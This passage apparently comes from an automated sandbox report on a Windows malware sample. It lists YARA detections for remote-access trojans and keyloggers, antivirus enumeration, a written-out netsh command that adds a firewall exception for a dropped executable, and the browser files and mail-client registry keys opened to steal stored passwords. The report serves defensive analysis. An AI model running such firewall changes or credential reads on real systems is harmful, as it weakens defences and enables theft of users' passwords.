Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Code function: 2_2_049804AE GetUserNameW, 2_2_049804AE
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 14_2_00406278 GetVersionExA, 14_2_00406278
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Yara detected AsyncRAT
Source: Yara match File source: 0000000C.00000000.429733559.00000000006E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.599252774.00000000006E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.601243946.0000000002AF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: tmp87E4.tmp.exe PID: 5036, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe, type: DROPPED
Source: Yara match File source: 12.0.tmp87E4.tmp.exe.6e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.tmp87E4.tmp.exe.6e0000.0.unpack, type: UNPACKEDPE
Modifies the windows firewall
Source: C:\Users\user\AppData\Roaming\servieda.exe Process created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram 'C:\Users\user\AppData\Roaming\servieda.exe' 'servieda.exe' ENABLE
Uses netsh to modify the Windows network and firewall settings
Source: C:\Users\user\AppData\Roaming\servieda.exe Process created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram 'C:\Users\user\AppData\Roaming\servieda.exe' 'servieda.exe' ENABLE
AV process strings found (often used to terminate AV products)
Source: tmp87E4.tmp.exe, 0000000C.00000003.516960849.000000000506E000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.601888472.0000000001070000.00000004.00000020.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information:

Yara detected HawkEye Keylogger
Source: Yara match File source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.609034784.0000000003021000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: tmpFB21.tmp.exe PID: 4928, type: MEMORY
Source: Yara match File source: Process Memory Space: pgr.exe PID: 1068, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, type: DROPPED
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.pgr.exe.3a3fd88.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.8ffa72.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.pgr.exe.3a46190.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.tmpFB21.tmp.exe.8a9c0d.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.8a9c0d.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.tmpFB21.tmp.exe.8ffa72.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.pgr.exe.3a3fd88.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.pgr.exe.3a47b95.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.3048e00.4.raw.unpack, type: UNPACKEDPE
Yara detected MailPassView
Source: Yara match File source: 0000000D.00000002.611737671.0000000004021000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: tmpFB21.tmp.exe PID: 4928, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 1428, type: MEMORY
Source: Yara match File source: Process Memory Space: pgr.exe PID: 1068, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, type: DROPPED
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.pgr.exe.3a3fd88.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.4027e00.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.8ffa72.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.4027e00.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.tmpFB21.tmp.exe.8ffa72.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.pgr.exe.3a46190.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.8ffa72.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.tmpFB21.tmp.exe.8a9c0d.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.8a9c0d.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.tmpFB21.tmp.exe.8ffa72.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.pgr.exe.3a3fd88.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.pgr.exe.3a47b95.1.raw.unpack, type: UNPACKEDPE
Yara detected Njrat
Source: Yara match File source: 00000000.00000003.361826559.000001B866181000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.375381174.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.434132652.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.386399141.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.418513533.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.364575966.00000000000A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.599389764.00000000000A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.431917812.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.355914114.00000000001D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.404397604.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.599254975.0000000000082000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.360210292.0000000000696000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.361022264.000001B86606A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.416270861.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.407415597.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.379800367.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.361732058.000001B8660A7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.409647935.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.429703452.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.363543444.000001B865F71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.384190622.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.420692346.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.600750205.00000000006AA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.392012717.0000000000A72000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.422988044.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.397417022.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.365445146.00000000001D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.388634565.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.381975904.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.390816638.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.414035813.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.399625080.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.395800979.0000000000A72000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.363508087.000001B865F8D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.425183434.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.377587214.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411854151.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.519777905.00000000006B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.427394879.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.401942814.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.436364231.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.369408079.000001B867140000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.360863456.0000000000082000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: d4c6a6df7bab3dad31763de990c4ed82.exe PID: 2244, type: MEMORY
Source: Yara match File source: Process Memory Space: servieda.exe PID: 5648, type: MEMORY
Source: Yara match File source: Process Memory Space: wscript.exe PID: 5972, type: MEMORY
Source: Yara match File source: Process Memory Space: Tmp.exe PID: 240, type: MEMORY
Source: Yara match File source: Process Memory Space: pgr.exe PID: 1068, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\servieda.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Tmp.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\pgr.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe, type: DROPPED
Source: Yara match File source: 0.3.wscript.exe.1b86717d130.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wscript.exe.1b8660a7cb0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wscript.exe.1b8660a7cb0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wscript.exe.1b8660a7cb0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wscript.exe.1b86717d130.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wscript.exe.1b8660a7cb0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.pgr.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.pgr.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.servieda.exe.a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.servieda.exe.a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Tries to steal Instant Messenger accounts or passwords
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
Tries to steal Mail credentials (via file access)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Tries to steal Mail credentials (via file registry)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword 14_2_00402D9A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword 14_2_00402D9A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: ESMTPPassword 14_2_004033D7
Yara detected WebBrowserPassView password recovery tool
Source: Yara match File source: 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.611737671.0000000004021000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: tmpFB21.tmp.exe PID: 4928, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 5824, type: MEMORY
Source: Yara match File source: Process Memory Space: pgr.exe PID: 1068, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, type: DROPPED
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.4040020.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.pgr.exe.3a3fd88.3.raw.unpack, type: UNPACKEDPE
